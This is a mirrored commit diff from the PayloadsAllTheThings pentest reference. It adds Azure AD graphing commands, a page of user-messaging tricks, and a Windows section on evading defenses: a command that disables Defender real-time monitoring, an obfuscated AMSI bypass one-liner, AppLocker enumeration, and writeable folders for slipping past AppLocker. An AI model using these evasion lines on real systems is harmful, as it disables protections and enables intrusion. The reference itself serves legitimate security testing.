mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 15:22:51 +00:00
Misc & Tricks Page + AMSI + Defender
This commit is contained in:
parent
81655945f9
commit
c1731041b5
3 changed files with 81 additions and 3 deletions
|
@ -205,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds
|
||||||
PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
|
PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Stormspotter, graphing Azure and Azure Active Directory objects
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18
|
||||||
|
git clone https://github.com/Azure/Stormspotter
|
||||||
|
cd Stormspotter
|
||||||
|
pipenv install .
|
||||||
|
stormspotter --cli
|
||||||
|
stormdash -dbu <neo4j-user> -dbp <neo4j-pass>
|
||||||
|
Browse to http://127.0.0.1:8050 to interact with the graph.
|
||||||
|
```
|
||||||
|
|
||||||
|
Other interesting commands to enumerate Azure AD.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Azure AD powershell module
|
# Azure AD powershell module
|
||||||
|
@ -470,7 +483,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
|
* [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
|
||||||
* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
|
* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
|
||||||
* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
|
* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
|
||||||
* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
|
* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
|
||||||
* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)
|
* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)
|
||||||
|
|
17
Methodology and Resources/Miscellaneous - Tricks.md
Normal file
17
Methodology and Resources/Miscellaneous - Tricks.md
Normal file
|
@ -0,0 +1,17 @@
|
||||||
|
# Miscellaneous & Tricks
|
||||||
|
|
||||||
|
All the tricks that couldn't be classified somewhere else.
|
||||||
|
|
||||||
|
## Send a message to another user
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Windows
|
||||||
|
PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
|
||||||
|
PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"
|
||||||
|
|
||||||
|
# Linux
|
||||||
|
$ wall "Stop messing with the XXX service !"
|
||||||
|
$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root
|
||||||
|
$ who
|
||||||
|
$ write root pts/2 # press Ctrl+D after typing the message.
|
||||||
|
```
|
|
@ -6,7 +6,11 @@
|
||||||
* [Windows Version and Configuration](#windows-version-and-configuration)
|
* [Windows Version and Configuration](#windows-version-and-configuration)
|
||||||
* [User Enumeration](#user-enumeration)
|
* [User Enumeration](#user-enumeration)
|
||||||
* [Network Enumeration](#network-enumeration)
|
* [Network Enumeration](#network-enumeration)
|
||||||
* [AppLocker Enumeration](#applocker-enumeration)
|
* [Antivirus & Detections](#antivirus--detections)
|
||||||
|
* [Windows Defender](#windows-defender)
|
||||||
|
* [AppLocker Enumeration](#applocker-enumeration)
|
||||||
|
* [Powershell](#powershell)
|
||||||
|
* [Default Writeable Folders](#default-writeable-folders)
|
||||||
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
||||||
* [SAM and SYSTEM files](#sam-and-system-files)
|
* [SAM and SYSTEM files](#sam-and-system-files)
|
||||||
* [Search for file contents](#search-for-file-contents)
|
* [Search for file contents](#search-for-file-contents)
|
||||||
|
@ -223,11 +227,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
|
||||||
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||||||
```
|
```
|
||||||
|
|
||||||
## AppLocker Enumeration
|
## Antivirus & Detections
|
||||||
|
|
||||||
|
### Windows Defender
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# check status of Defender
|
||||||
|
PS C:\> Get-MpComputerStatus
|
||||||
|
|
||||||
|
# disable Real Time Monitoring
|
||||||
|
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||||
|
```
|
||||||
|
|
||||||
|
### AppLocker Enumeration
|
||||||
|
|
||||||
- With the GPO
|
- With the GPO
|
||||||
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
||||||
|
|
||||||
|
List AppLocker rules
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS C:\> $a = Get-ApplockerPolicy -effective
|
||||||
|
PS C:\> $a.rulecollections
|
||||||
|
```
|
||||||
|
|
||||||
|
### Powershell
|
||||||
|
|
||||||
|
Default powershell locations in a Windows system.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
C:\windows\syswow64\windowspowershell\v1.0\powershell
|
||||||
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||||||
|
```
|
||||||
|
|
||||||
|
Example of AMSI Bypass.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Default Writeable Folders
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
|
||||||
|
C:\Windows\System32\spool\drivers\color
|
||||||
|
C:\Windows\Tasks
|
||||||
|
C:\windows\tracing
|
||||||
|
```
|
||||||
|
|
||||||
## EoP - Looting for passwords
|
## EoP - Looting for passwords
|
||||||
|
|
||||||
### SAM and SYSTEM files
|
### SAM and SYSTEM files
|
||||||
|
|
Loading…
Reference in a new issue